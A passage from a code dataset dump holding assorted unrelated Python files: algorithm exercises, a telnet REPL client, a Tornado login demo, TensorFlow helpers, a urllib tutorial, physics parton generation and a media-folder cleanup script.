j+1\r\n\r\n while len(ReducedCoef) < len(factorBase):\r\n ReducedCoef.append(0)\r\n\r\n result = -s\r\n for l in range(0,len(C)):\r\n result = (result + C[l]*ReducedCoef[l]) % order\r\n \r\n s = s+1\r\n\r\n return result\r\n\r\n \r\n'''\r\nbeta = 9451\r\n#print(dilog(5,base, 14087, beta))\r\nbase = [2,3,5,7]\r\nprint(dilog(5,base, 10007, beta))\r\n\r\n'''\r\nbase = [2,3,5,7,11,13,17]\r\np = 10930889\r\nalpha = 2317547\r\nbeta = 5273437\r\norder = 59407\r\nprint(dilog(alpha,base, p, beta, order))\r\n\r\n","sub_path":"Project.py","file_name":"Project.py","file_ext":"py","file_size_in_byte":7169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"525550139","text":"\"\"\"\nGiven an array of strings, group anagrams together.\n\nFor example, given: [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"], \nReturn:\n\n[\n [\"ate\", \"eat\",\"tea\"],\n [\"nat\",\"tan\"],\n [\"bat\"]\n]\nNote:\nFor the return value, each inner list's elements must follow the lexicographic order.\nAll inputs will be in lower-case.\nUpdate (2015-08-09):\nThe signature of the function had been updated to return list> instead of list, as suggested here. 
If you still see your function signature return a list, please click the reload button to reset your code definition.\n\"\"\"\nclass Solution:\n # @param {string[]} strs\n # @return {string[][]}\n def groupAnagrams(self, strs):\n if strs == [\"\"]: return [[\"\"]]\n table = dict()\n for s in strs:\n k = list(s)\n k.sort()\n k = tuple(k)\n if k not in table:\n table[k] = [s]\n else:\n table[k].append(s)\n a = []\n [a.extend([sorted(i)]) for i in table.values()]\n return a","sub_path":"group_anagrams.py","file_name":"group_anagrams.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"339133918","text":"#!/usr/bin/env python3\nimport sys\nimport string\n\nlast_airport_id = None\ncur_1 = \"-\"\ncur_2 = \"-\"\ncur_3 = \"-\"\ncur_4 = \"-\"\ncur_5 = \"-\"\ncur_6 = \"-\"\n\nfor line in sys.stdin:\n\tline = line.strip()\n\tlinea = line.split(',')\n\tif not last_airport_id or last_airport_id != linea[0]:\n\t\tlast_airport_id = linea[0]\n\t\tcur_1 = linea[2]\n\t\tcur_2 = linea[3]\n\t\tcur_3 = linea[4]\n\t\tcur_4 = linea[5]\n\t\tcur_5 = linea[6]\n\t\tcur_6 = linea[7]\n\telif linea[0] == last_airport_id:\n\t\tlinea[1] = cur_1\n\t\tlinea[2] = cur_2\n\t\tlinea[3] = cur_3\n\t\tlinea[4] = cur_4\n\t\tlinea[5] = cur_5\n\t\tlinea[6] = cur_6\n\t\tprint(linea[1],sep='',end='')\n\t\tfor i in range(2,len(linea)):\n\t\t\tprint(',',linea[i],sep='',end='')\n\t\tprint('')\n","sub_path":"alumnos/francisco_bahena/tarea_3/parte_2/ejercicio_3/reducer3_2.py","file_name":"reducer3_2.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"15677662","text":"# Credits: //stackoverflow.com/questions/1648917/given-a-latitude-and-longitude-and-distance-i-want-to-find-a-bounding-box\n\nimport math\n\n\nclass BoundingBox(object):\n def __init__(self, *args, **kwargs):\n self.lat_min = None\n self.lon_min = None\n self.lat_max = None\n self.lon_max = None\n\n\ndef get_bounding_box(latitude_in_degrees, longitude_in_degrees, half_side_in_km):\n assert half_side_in_km > 0\n assert -90.0 <= latitude_in_degrees <= 90.0\n assert -180.0 <= longitude_in_degrees <= 180.0\n\n lat = math.radians(latitude_in_degrees)\n lon = math.radians(longitude_in_degrees)\n\n radius = 6371\n parallel_radius = radius * math.cos(lat)\n\n lat_min = lat - half_side_in_km / radius\n lat_max = lat + half_side_in_km / radius\n lon_min = lon - half_side_in_km / parallel_radius\n lon_max = lon + half_side_in_km / parallel_radius\n rad2deg = math.degrees\n\n box = BoundingBox()\n box.lat_min = rad2deg(lat_min)\n box.lon_min = rad2deg(lon_min)\n box.lat_max = rad2deg(lat_max)\n box.lon_max = rad2deg(lon_max)\n\n return box\n","sub_path":"airbnb/bounding_box.py","file_name":"bounding_box.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"105283881","text":"import pytest\nimport datetime\nfrom application.model import GoalModel, GroupModel\nfrom application.exc import AppBaseException\n\n\ndef test_goal_create_by_group(group_factory):\n group = group_factory()\n group_id = group.id\n assert group_id\n goal = group.create_goal(\n criteria='criteria',\n started_date='2018-06-01',\n ended_date='2018-06-30',\n )\n\n assert goal\n assert goal.group_id == group_id\n\n\ndef test_group_has_only_one_goal(group_factory):\n group = group_factory()\n group_id = group.id\n assert group_id\n goal = 
group.create_goal(\n criteria='criteria',\n started_date='2018-06-01',\n ended_date='2018-06-30',\n )\n assert goal.id\n\n with pytest.raises(AppBaseException) as excinfo:\n group.create_goal(\n criteria='criteria',\n started_date='2018-06-01',\n ended_date='2018-06-30',\n )\n assert isinstance(excinfo.value, AppBaseException)\n\n\ndef test_goal_update(fixture_goal):\n goal = fixture_goal\n title = 'updated title'\n description = 'updated description'\n goal.title = title\n goal.description = description\n assert goal\n assert goal.title == title\n assert goal.description == description\n\n\ndef test_fixture_goal_backref_one_to_on(fixture_goal):\n assert fixture_goal.group\n assert fixture_goal.group_id == fixture_goal.group.id\n\n\ndef test_create_achievements_멤버의_성과카드를_생성한다(\n user_factory,\n group_with_goal_many_users: GroupModel,\n\n):\n # given\n group = group_with_goal_many_users\n goal: GoalModel = group.goal\n assert goal\n\n # when\n user = user_factory()\n achievements = goal.create_achievements(user.id)\n\n # then\n required_days_count = ((goal.ended_date - goal.started_date) + datetime.timedelta(days=1)).days\n assert required_days_count == len(achievements)\n","sub_path":"tests/application/model/test_goal.py","file_name":"test_goal.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"569483625","text":"#!/usr/bin/python\n\nimport os\nimport errno\nimport sys\nimport socket\n\nHOST = '127.0.0.1'\nPORT = 2222\n\nNEWLINE = '\\r\\n'\n\nTELNET_IS = b'\\x00'\n\nTELNET_SE = b'\\xf0'\nTELNET_GOA = b'\\xf9'\nTELNET_SB = b'\\xfa'\nTELNET_WILL = b'\\xfb'\nTELNET_WONT = b'\\xfc'\nTELNET_DO = b'\\xfd'\nTELNET_DONT = b'\\xfe'\nTELNET_IAC = b'\\xff'\n\nTELOPT_TERMINAL_TYPE = b'\\x18'\nTELOPT_EXTEND = b'\\xfe'\n\nTELMSG_GOAHEAD = TELNET_IAC + TELNET_GOA\nTELMSG_TERM_BEGIN = TELNET_IAC + TELNET_SB + TELOPT_TERMINAL_TYPE + TELNET_IS\nTELMSG_TERM_END = TELNET_IAC + TELNET_SE\nTELMSG_EXTEND_BEGIN = TELNET_IAC + TELNET_SB + TELOPT_EXTEND + TELNET_IS\nTELMSG_EXTEND_END = TELNET_IAC + TELNET_SE\n\nTELNET_CMDLIST_NOARG = b'\\xf1\\xf2x\\f3x\\f4x\\xf5\\xf6\\xf7\\xf8\\xf9'\nTELNET_CMDLIST_ARG = b'\\xfb\\xfc\\xfd\\xfe'\n\nclass Connection(object):\n\n def __init__(self, host, port):\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.connect((host, port))\n self.__buffer = ''\n\n def __recv(self):\n data = self.socket.recv(2048)\n if len(data) == 0:\n raise socket.error(errno.ECONNRESET, os.strerror(errno.ECONNRESET))\n self.__buffer += data\n return data\n\n def __pop_buffer(self):\n result = self.__buffer\n self.__buffer = ''\n return result\n\n def __pop_telnet_command(self, end=None):\n n = len(self.__buffer)\n i = self.__buffer.find(TELNET_IAC, 0, end)\n if i < 0:\n return None\n if n < i + 2:\n return None\n c = self.__buffer[i+1]\n if c in TELNET_CMDLIST_NOARG:\n result = self.__buffer[i:i+2]\n self.__buffer = self.__buffer[:i] + self.__buffer[i+2:]\n return result\n elif c in TELNET_CMDLIST_ARG:\n if n > i + 2:\n result = self.__buffer[i:i+3]\n self.__buffer = self.__buffer[:i] + self.__buffer[i+3:]\n return result\n elif c in TELNET_SB:\n j = self.__buffer.find(TELNET_IAC + TELNET_SE, i)\n if j > 0:\n result = self.__buffer[i:j+2]\n self.__buffer = self.__buffer[:i] + self.__buffer[j+2:]\n return result\n else:\n raise ValueError\n return None \n\n def __read(self):\n while True:\n while True:\n result = self.__pop_telnet_command()\n if result is None:\n break\n elif 
result == TELMSG_GOAHEAD: # GO AHEAD\n return self.__pop_buffer()\n elif result.startswith(TELMSG_EXTEND_BEGIN):\n self.__extendmsg = result[4:-2]\n return ''\n self.__recv()\n\n def __write(self, data):\n if len(data) == 0:\n return\n self.socket.sendall(data)\n\n def __fake_telnet_negotiation(self):\n self.__write(TELNET_IAC + TELNET_WILL + TELOPT_TERMINAL_TYPE)\n self.__write(TELNET_IAC + TELNET_WILL + TELOPT_EXTEND)\n self.__write(TELMSG_TERM_BEGIN + 'REPLCLIENT' + TELMSG_TERM_END)\n\n def startup(self):\n self.__fake_telnet_negotiation()\n return self.__read()\n\n def shutdown(self, how):\n return self.socket.shutdown(how)\n\n def send_extendmsg(self, cmd):\n self.__write(TELMSG_EXTEND_BEGIN + cmd + TELMSG_EXTEND_END)\n result = self.__read()\n if result != '':\n raise ValueError\n extendmsg = self.__extendmsg.split('\\n')\n self.__extendmsg = None\n return extendmsg\n\n def send_command(self, cmd):\n self.__write(cmd + NEWLINE)\n return self.__read()\n\n\nclass Completer(object):\n\n def __init__(self, connection):\n self.connection = connection \n self.clear_cache()\n\n def clear_cache(self):\n self.__cache = {}\n\n def cache_val(self, v, f):\n if v not in self.__cache:\n self.__cache[v] = f()\n return self.__cache[v]\n\n def get_locals(self):\n return self.connection.send_extendmsg(\"'\\\\n'.join(locals().keys())\")\n\n def get_dir(self, code):\n return self.connection.send_extendmsg(\"'\\\\n'.join(dir(%s))\" % code)\n\n def get_path_dir(self, locs, path):\n attrs = locs\n for i, token in enumerate(path):\n if token in attrs:\n attrs = self.get_dir('.'.join(path[0:i+1]))\n else:\n return []\n return attrs\n\n def completer(self, text, state):\n if text == '':\n return None\n try:\n locs = self.cache_val('locals', self.get_locals)\n if '.' in text:\n tokens = text.split('.')\n start = tokens[0:-1]\n last = tokens[-1]\n\n name = 'dir_' + '.'.join(start)\n attrs = self.cache_val(name, lambda: self.get_path_dir(locs, start))\n \n suggestion = [ w for w in attrs if w.startswith(last) ][state]\n return '.'.join(start + [suggestion])\n else:\n return [ w for w in locs if w.startswith(text) ][state]\n except IndexError:\n return None\n\n\ndef main():\n connection = Connection(HOST, PORT)\n completer = Completer(connection)\n \n try:\n import readline\n readline.set_completer(completer.completer)\n readline.parse_and_bind('tab: complete')\n except ImportError:\n pass\n\n try:\n sys.stdout.write(connection.startup())\n while True:\n completer.clear_cache()\n cmd = raw_input('> ')\n cmd = cmd.strip()\n sys.stdout.write(connection.send_command(cmd))\n except EOFError:\n sys.stdout.write(NEWLINE + 'connection closing...' 
+ NEWLINE)\n connection.shutdown(socket.SHUT_RDWR)\n except socket.error as err:\n sys.stdout.write(err.args[1] + NEWLINE)\n return\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"116198294","text":"import Tornados.web\r\nimport Tornados.ioloop\r\nimport uuid\r\n\r\ndict_sessions = {}\r\n\r\n\r\nclass BaseHandler(Tornados.web.RequestHandler):\r\n def get_current_user(self):\r\n if self.get_secure_cookie(\"session_id\") is None:\r\n return None\r\n session_id = self.get_secure_cookie(\"session_id\").decode(\"utf-8\")\r\n return dict_sessions.get(session_id)\r\n\r\n\r\nclass MainHandler(BaseHandler):\r\n @Tornados.web.authenticated\r\n def get(self):\r\n name = Tornados.escape.xhtml_escape(self.current_user)\r\n self.write(\"Hello, \" + name)\r\n\r\n\r\nclass LoginHandler(BaseHandler):\r\n def get(self):\r\n self.write('
<html><body><form action=\"/login\" method=\"post\">'\r\n                   'Name: <input type=\"text\" name=\"name\">'\r\n                   '<input type=\"submit\" value=\"Sign in\">'\r\n                   '</form></body></html>
')\r\n\r\n def post(self):\r\n if len(self.get_argument(\"name\")) < 3:\r\n self.redirect(\"/login\")\r\n return\r\n session_id = str(uuid.uuid1())\r\n dict_sessions[session_id] = self.get_argument(\"name\")\r\n self.set_secure_cookie(\"session_id\", session_id)\r\n self.redirect(\"/\")\r\n\r\n\r\napplication = Tornados.web.Application(\r\n [\r\n (r\"/\", MainHandler),\r\n (r\"/login\", LoginHandler),\r\n ],\r\n cookie_secret=\"SECRET_DONT_LEAK\",\r\n login_url=\"/login\")\r\n\r\n\r\ndef main():\r\n application.listen(8888)\r\n Tornados.ioloop.IOLoop.current().start()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"code/chapter07/7-6.py","file_name":"7-6.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"99987276","text":"'''\n@Descripttion: \n@version: \n@Author: Liang Anqing\n@Date: 2020-08-06 19:23:58\n@LastEditors: Liang Anqing\n@LastEditTime: 2020-08-06 19:36:40\n'''\ndef solution(n):\n rs=0\n flag=1\n for i in range(1,2*n+1):\n rs+=(1/i)*flag\n flag*=-1\n rs*=0.2000\n return round(rs,4)\nif __name__=='__main__':\n n=int(input())\n res=solution(n)\n print(res)","sub_path":"京东数列求和.py","file_name":"京东数列求和.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"191802675","text":"import tensorflow as tf\n\n\ndef weights(shape, initializer='variance_scaling', reg_norm=True, reg_coef=0.001, name='variable'):\n if initializer == 'variance_scaling':\n init = tf.variance_scaling_initializer()\n else:\n init = tf.glorot_normal_initializer()\n weight = tf.Variable(init(shape), name=name)\n\n if reg_norm:\n l2_norm = reg_coef * tf.reduce_sum(tf.squared(weight))\n return weight, l2_norm\n\n return weight\n\ndef dense(out_dim, input, mean=0, var=1., activation=tf.nn.relu):\n in_dim = input.get_shape()[-1].value\n W = tf.Variable(tf.random_normal([in_dim, out_dim], mean, var))\n b = tf.Variable(tf.zeros([out_dim]))\n\n output = tf.matmul(input, W) + b\n if activation:\n output = activation(output)\n\n return output\n\ndef batch_norm(x, if_train, type='conv', epsilon=1e-3, decay=0.9):\n '''\n Batch normalization layer\n Args:\n - type: either `conv` or `fc`; determines which axes\n to aggregate moments over.\n '''\n if type == 'conv':\n axes = [0, 1, 2]\n else:\n axes = [0]\n\n '''\n During training, we use the mean and variance per batch\n to standardize; however, during evaluation, we want to use\n an exponential moving average of the batch means we've\n seen thus far.\n '''\n mean, var = tf.nn.moments(x, axes, keep_dims=True)\n ema = tf.train.ExponentialMovingAverage(decay=decay)\n ema_op = ema.apply([mean, var])\n\n with tf.control_dependencies([ema_op]):\n ema_mean, ema_var = tf.identity(mean), tf.identity(var)\n\n batch_mean, batch_var = tf.cond(\n if_train,\n lambda : (ema_mean, ema_var),\n lambda : (ema.average(mean), ema.average(var)))\n \n out_shape = tf.shape(mean)\n gamma = tf.Variable(\n tf.constant(1., shape=out_shape),\n name='gamma',\n trainable=True)\n beta = tf.Variable(\n tf.constant(0., shape=out_shape),\n name='beta',\n trainable=True)\n\n # Apply the tensorflow batch normalization operation\n y = tf.nn.batch_normalization(x, batch_mean,\n batch_var, beta, gamma, epsilon)\n\n return y\n","sub_path":"ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} 
+{"seq_id":"424839455","text":"import random\r\nimport urllib\r\nfrom urllib import request,parse\r\n#urlopen简单发送网络请求\r\nua_list = [\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\",\r\n \"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11\",\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6\",\r\n \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6\"\r\n]\r\nurl = \"https://www.baidu.com\"\r\nheader = random.choice(ua_list)\r\n# print(header)\r\nrequest = urllib.request.Request(url)\r\nrequest.add_header(\"User-Agent\",header)\r\n#get——header()字符串参数,第一个字母大写,后面的全部小写\r\nrequest.get_header(\"Header\")\r\n\r\n# response = urllib.request.urlopen(request)\r\n# print(response.code)\r\n# html = response.read()\r\n# print(html)\r\n\r\n\r\n\r\n\r\n#quote() 主要将中文转化为ascll码\r\nurls = \"https://www.baidu.com/s?wd=火影忍者\"\r\nurl = \"https://www.baidu.com/s?wd=\"\r\ndata = parse.quote('火影忍者')\r\nres = url + data\r\nprint(res)\r\n\r\n\r\n# 通过urlencode()方法,将字典键值对按URL编码转换,从而能被web服务器接受\r\nparams = {'name':'冬风诉','pw':'fgmdd537'}\r\ndatas = parse.urlencode(params)\r\nprint(\"这是urlencode方法---\"+datas)\r\n#parse_qsl是转换成元组格式\r\n# print(parse.parse_qsl(datas))\r\n#通过parse_qs把url编码转回中文字典格式\r\nprint(parse.parse_qs(datas))\r\n\r\n#unquote() 主要将ascll码转化为中文\r\nprint(parse.unquote(res))\r\nprint(type(res))\r\n#quote() 将中文转化为ascll码\r\nprint(parse.quote(urls))\r\n\r\nprint(parse.unquote('kw=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F&ie=utf-8&pn=50'))\r\nprint(parse.quote('kw=英雄联盟&ie=utf-8&pn=50'))\r\n\r\n\r\n# urllib.error\r\n#异常处理请求\r\n#URLError error,所有的request异常处理\r\n#HTTPError URLError子类\r\n# code:请求状态码 reason:错误的原因 headers:相应的报文头(头信息)\r\n\r\n#urllib.robotparse\r\n#Robots(机器人)协议:不是命令,单纯的文件,搜索引擎看的第一个文件\r\n\r\n","sub_path":"demo01.py","file_name":"demo01.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"84106655","text":"import numpy as np\nfrom random import choice\n\ndef lorentz(beta, fourVector):\n \"\"\" Takes as input relative beta from O -> O'\n and calculates fourVector -> fourVector' \"\"\"\n\n beta2 = np.dot(beta, beta)\n gamma = 1./np.sqrt(1. 
- beta2)\n \n Lambda = np.array([ [gamma, -gamma*beta[0], -gamma*beta[1], -gamma*beta[2]],\n [-gamma * beta[0], 1 + (gamma-1)*beta[0]**2/beta2, (gamma-1)*beta[0]*beta[1]/beta2, (gamma-1)*beta[0]*beta[2]/beta2],\n [-gamma * beta[1], (gamma-1)*beta[1]*beta[0]/beta2, 1 + (gamma-1)*beta[1]**2/beta2, (gamma-1)*beta[1]*beta[2]/beta2],\n [-gamma * beta[2], (gamma-1)*beta[2]*beta[0]/beta2, (gamma-1)*beta[2]*beta[1]/beta2, 1 + (gamma-1)*beta[2]**2/beta2]], dtype=np.float32)\n\n return np.dot(Lambda, fourVector)\n\ndef create_anti(particle):\n return [1 - x for x in particle[:-1]] + [1]\n\ndef create_duplet(meson, mass_parton=0.01):\n \"\"\" Takes position, momentum, and mass from meson\n and creates parton antiparton duplet with same\n energy in LRF and same momentum of CF.\n Standard mass of parton is 0.01 GeV, colour chosen at random \"\"\"\n\n # position for both partons is same as meson's position in cf\n pos = np.array(meson[0:3] + [1], dtype=np.float32)\n\n # LRF Calculation of Energy\n mass_meson = meson[-1]\n\n r = np.sqrt((mass_meson**2 * 0.25 - mass_parton**2))\n phi = np.random.rand()*2*np.pi\n theta = np.random.rand()*2*np.pi\n \n\n p_parton1 = np.array([0,0,0,0], dtype=np.float32)\n p_parton1[0] = mass_meson * 0.5\n p_parton1[1] = r * np.sin(phi) * np.cos(theta)\n p_parton1[2] = r * np.sin(phi) * np.sin(theta)\n p_parton1[3] = r * np.cos(phi)\n\n p_parton2 = np.array([0,0,0,0], dtype=np.float32)\n p_parton2[0] = mass_meson * 0.5\n p_parton2[1] = -r * np.sin(phi) * np.cos(theta)\n p_parton2[2] = -r * np.sin(phi) * np.sin(theta)\n p_parton2[3] = -r * np.cos(phi)\n\n # CF Calculation of Momentum\n\n v_meson = np.array(meson[4:7]) / meson[3]\n p_meson = np.array(meson[3:7])\n\n\n p_parton1 = lorentz(-v_meson, p_parton1)\n p_parton2 = lorentz(-v_meson, p_parton2)\n \n # Chose color at random\n\n c_parton1 = choice([x + [1] for x in [ [0,0,1], [0,1,0], [1,0,0] ] ])\n c_parton2 = create_anti(c_parton1)\n c_parton1 = np.array(c_parton1, dtype=np.float32)\n c_parton2 = np.array(c_parton2, dtype=np.float32)\n\n # return each parton as np.array\n\n parton1 = [pos, p_parton1, c_parton1]\n parton2 = [pos, p_parton2, c_parton2]\n\n return parton1, parton2\n\ndef create_triplet(baryon, mass_parton=0.01):\n \"\"\" Takes position, momentum, and mass from baryon\n and creates parton triplet with same\n energy in LRF and same momentum of CF.\n Standard mass of parton is 0.01 GeV\"\"\"\n\n # position for partons is same as baryon's position in cf\n pos = np.array(baryon[0:3] + [1], dtype=np.float32)\n\n\n # LRF Calculation of Energy\n mass_baryon = baryon[-1]\n\n r = np.sqrt(((mass_baryon/3.)**2 - mass_parton**2))\n phi = np.random.rand()*2*np.pi\n theta = np.random.rand()*2*np.pi\n \n p_parton1 = np.array([0,0,0,0], dtype=np.float32)\n p_parton1[0] = mass_baryon/3.\n p_parton1[1] = r * np.sin(phi) * np.cos(theta)\n p_parton1[2] = r * np.sin(phi) * np.sin(theta)\n p_parton1[3] = r * np.cos(phi)\n\n r = np.sqrt(((mass_baryon/3.)**2 - mass_parton**2))\n phi = np.random.rand()*2*np.pi\n theta = np.random.rand()*2*np.pi\n \n p_parton2 = np.array([0,0,0,0], dtype=np.float32)\n p_parton2[0] = mass_baryon/3.\n p_parton2[1] = r * np.sin(phi) * np.cos(theta)\n p_parton2[2] = r * np.sin(phi) * np.sin(theta)\n p_parton2[3] = r * np.cos(phi)\n\n p_parton3 = -p_parton1 - p_parton2\n p_parton3[0] = mass_baryon/3.\n\n # CF Calculation of Momentum\n\n v_baryon = np.array(baryon[4:7]) / baryon[3]\n p_baryon = np.array(baryon[3:7])\n\n p_parton1 = lorentz(-v_baryon, p_parton1)\n p_parton2 = lorentz(-v_baryon, p_parton2)\n 
p_parton3 = lorentz(-v_baryon, p_parton3)\n\n # set color r,g,b (momenta at random, though no bias introduced)\n\n c_parton1 = np.array([0,0,1,1], dtype=np.float32)\n c_parton2 = np.array([0,1,0,1], dtype=np.float32)\n c_parton3 = np.array([1,0,0,1], dtype=np.float32)\n\n # return each parton as np.array\n\n parton1 = [pos, p_parton1, c_parton1]\n parton2 = [pos, p_parton2, c_parton2]\n parton3 = [pos, p_parton3, c_parton3]\n\n return parton1, parton2, parton3\n\n \n","sub_path":"create_partons.py","file_name":"create_partons.py","file_ext":"py","file_size_in_byte":4437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"291552057","text":"# -*- coding: utf-8 -*-\n__author__ = 'gelse'\n\nimport common.Choices\nimport platform\nimport os\nimport subprocess\nimport re\n\n__vlc_path__ = os.path.join('C:\\\\\\\\', 'Program Files (x86)', 'VideoLAN', 'VLC', 'vlc.exe')\n__vlc_parameter__ = ['--play-and-exit', '--quiet', '--start-time=20']\n\n__date_pattern__ = re.compile(r'^(\\d\\d) (\\d\\d) (\\d\\d) (.*)$')\n\n\ndef is_chunk_file(filename):\n return filename is not None \\\n and '.chunk0' in filename\n\n\ndef get_remove_file_delegate(directory, filename):\n return lambda: True if os.remove(os.path.join(directory, filename)) else True\n\n\ndef get_play_file_delegate(queue_directory, filename):\n params = [__vlc_path__]\n params.extend(__vlc_parameter__)\n params.append(os.path.join(queue_directory, filename))\n return lambda: True if subprocess.call(params) else True\n\n\ndef all_files_have_same_size(queue_directory, queue_directory_content):\n return len(set([os.path.getsize(os.path.join(queue_directory, x))/10000 for x in queue_directory_content])) == 1\n\n\ndef get_qt_files(queue_directory_content):\n return [x for x in queue_directory_content if os.path.splitext(x)[0].endswith('qt')]\n\n\ndef sizeof_fmt(num):\n for x in ['bytes','KB','MB','GB','TB']:\n if num < 1024.0:\n return \"%3.1f %s\" % (num, x)\n num /= 1024.0\n\n\ndef handle_qt_files(queue_directory, queue_directory_content):\n qt_files = get_qt_files(queue_directory_content)\n if qt_files:\n print('\\n'.join(qt_files))\n if common.Choices.yesno('Delete qt files?', default='y'):\n for x in qt_files:\n os.remove(os.path.join(queue_directory, x))\n return True\n return False\n\n\ndef ask_to_play_file(queue_directory, queue_directory_content):\n return common.Choices.ask([common.Choices.AnswerTuple(\n key=str(ind + 1),\n text='Play {0} ({1} Byte)?'.format(a, sizeof_fmt(os.path.getsize(os.path.join(queue_directory, a)))),\n method=get_play_file_delegate(queue_directory, a))\n for ind, a in enumerate(queue_directory_content\n )],\n default='0',\n text='Choose file to play in {0}'.format(queue_directory))\n\n\ndef ask_for_file_to_delete(queue_directory, queue_directory_content):\n if all_files_have_same_size(queue_directory, queue_directory_content):\n print('-------------- ALL FILES SAME SIZE ----------------')\n return common.Choices.ask([common.Choices.AnswerTuple(\n key=str(ind + 1),\n text='Delete {0} ({1} Byte)?'.format(a, sizeof_fmt(os.path.getsize(os.path.join(queue_directory, a)))),\n method=get_remove_file_delegate(queue_directory, a))\n for ind, a in enumerate(queue_directory_content\n )],\n default='0',\n text='Choose file to delete in {0}'.format(queue_directory))\n\n\ndef parse_nubiles(queue_directory, filename):\n date = ''\n text = ''\n\n directory_subname = queue_directory.split(' - ')[-1]\n category_name = ''.join(os.path.split(queue_directory)[-1].split(' - ')[:-1])\n\n 
worker_string = filename\n if str(worker_string).startswith(category_name):\n worker_string = worker_string[len(category_name):]\n worker_string = str(worker_string).strip('.')\n worker_string = ''.join(os.path.splitext(worker_string)[:-1])\n worker_string = worker_string.replace('.', ' ')\n cleansed_name = worker_string\n result = __date_pattern__.match(worker_string)\n if result:\n date = '{0}.{1}.{2}'.format(result.group(1), result.group(2), result.group(3))\n text = result.group(4)\n text = re.sub(r'\\s?XXX\\s?', r'', text, flags=re.IGNORECASE)\n text = re.sub(r'\\s?1080p\\s?', r'', text, flags=re.IGNORECASE)\n text = re.sub(r'\\s?MP4-KTR\\s?', r'', text, flags=re.IGNORECASE)\n if str(text).startswith(directory_subname):\n text = text[(len(directory_subname)+1):]\n\n return filename, cleansed_name, date, text\n\n\ndef handle_multiple_directory(queue_directory, queue_directory_content):\n one_file_stays = True\n numeration = 2\n for (original_name, cleansed_name, date, text) in [parse_nubiles(queue_directory, filename) for filename in queue_directory_content]:\n if text:\n new_directory = '{0} - {1}'.format(queue_directory, text)\n else:\n if not common.Choices.yesno('Automove?'):\n return False\n if one_file_stays:\n one_file_stays = False\n print('File {0} stays in original directory.'.format(original_name))\n continue\n new_directory = '{0} {1}'.format(queue_directory, str(numeration))\n numeration += 1\n os.mkdir(new_directory)\n os.rename(os.path.join(queue_directory, original_name), os.path.join(new_directory, original_name))\n print('Created {0} and moved {1} there.'.format(os.path.split(new_directory)[-1], original_name))\n return True\n\ndef clean_up_directory(queue_directory):\n queue_directory_content = os.listdir(queue_directory)\n if len(queue_directory_content) == 1:\n # check if it is a chunk file and delete if it is\n if is_chunk_file(queue_directory_content[0]) and common.Choices.yesno('Delete {0} ?'.format(queue_directory_content[0])):\n os.remove(os.path.join(queue_directory, queue_directory_content[0]))\n os.rmdir(queue_directory)\n else:\n print('Everything ok with {0}, only content: \\n\\t{1}'.format(queue_directory, queue_directory_content[0]))\n elif len(queue_directory_content) == 0:\n os.rmdir(queue_directory)\n print('Deleted empty directory {0}'.format(queue_directory))\n else:\n if handle_qt_files(queue_directory, queue_directory_content):\n clean_up_directory(queue_directory) # recursive call to self until only 1 or 0 file is left\n return\n\n if handle_multiple_directory(queue_directory, queue_directory_content):\n clean_up_directory(queue_directory) # recursive call to self until only 1 or 0 file is left\n return\n\n if ask_to_play_file(queue_directory, queue_directory_content):\n clean_up_directory(queue_directory) # recursive call to self as long as user wants\n return\n\n if ask_for_file_to_delete(queue_directory, queue_directory_content):\n clean_up_directory(queue_directory) # recursive call to self until only 1 or 0 file is left\n return\n\n\nclass Main:\n def __init__(self):\n if platform.system() == 'Linux': # '==' for string comparison; 'is' checks identity\n self.__queueDir = '/fliegenstorage/NAS3/Public/xxx/_queue'\n self.__categoryDir = '/fliegenstorage/NAS3/Public/xxx/_categories'\n if platform.system() == 'Windows':\n self.__queueDir = os.path.join('Z:\\\\\\\\', 'xxx', '_queue')\n self.__categoryDir = os.path.join('D:\\\\\\\\', '_xxx', '_categories')\n self.__videoextensionlist = ['.mp4', '.mp7', '.mov', '.wmv', '.avi', '.mpg']\n\n def run(self):\n queue_content = 
